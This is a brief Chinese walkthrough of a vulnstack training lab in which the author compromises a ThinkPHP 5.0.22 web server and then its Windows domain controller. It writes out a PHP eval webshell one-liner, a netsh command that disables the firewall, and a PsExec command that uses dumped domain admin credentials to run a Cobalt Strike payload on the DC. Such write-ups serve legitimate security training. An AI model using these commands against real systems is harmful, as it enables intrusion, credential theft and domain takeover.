环 境
Win7 +phpstudy+thinkphp(5.0.22) 双网卡
ip 192.168.5.139 桥接模式
ip 192.168.138.136 仅主机模式
Win2008 仅主机模式
ip 192.168.5.139
下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/7/
首先访问url
Goby扫描 发现tp5.x 远程命令执行
查看目录后 写入一句话
echo "<?php @eval($_POST['123']);?>" >C://phpStudy//PHPTutorial//WWW//public//shell.php
菜刀连接
查看存活主机
查看详细ip地址 ipconfig /all 可以看到域 (忘了截图)
查找域ip ping sun.com
查看域内用户
提权system 查看进程无杀毒软件
CS制作木马 一直连不上
发现防火墙没有关闭 直接关闭
netsh firewall set opmode disable
获取域用户密码
提权SYSTEM
内网可以用psexec登录的主机,基于ipc共享,要打开445端口才可以,所以扫一下445端口
Win7 双网卡 dc 内网 这个时候就让dc主动链接cs 可以通过win7 中转会话
win7 进入中专 建立监听 监听地址6666
再次生成木马 选择刚才的监听 6666
把木马和工具上传到win7
刚才我们看到了域内有三个用户 这里的用户就是域内用户 密码在上面已经抓取出来了
shell C:\phpStudy\PHPTutorial\WWW\public\PsExec64.exe -accepteula \\192.168.138.138-u sun\Administrator -p admin@123 -d -c C:\phpStudy\PHPTutorial\WWW\public\dc.exe
抓取密码 可以看到dc的密码了域控也就到手了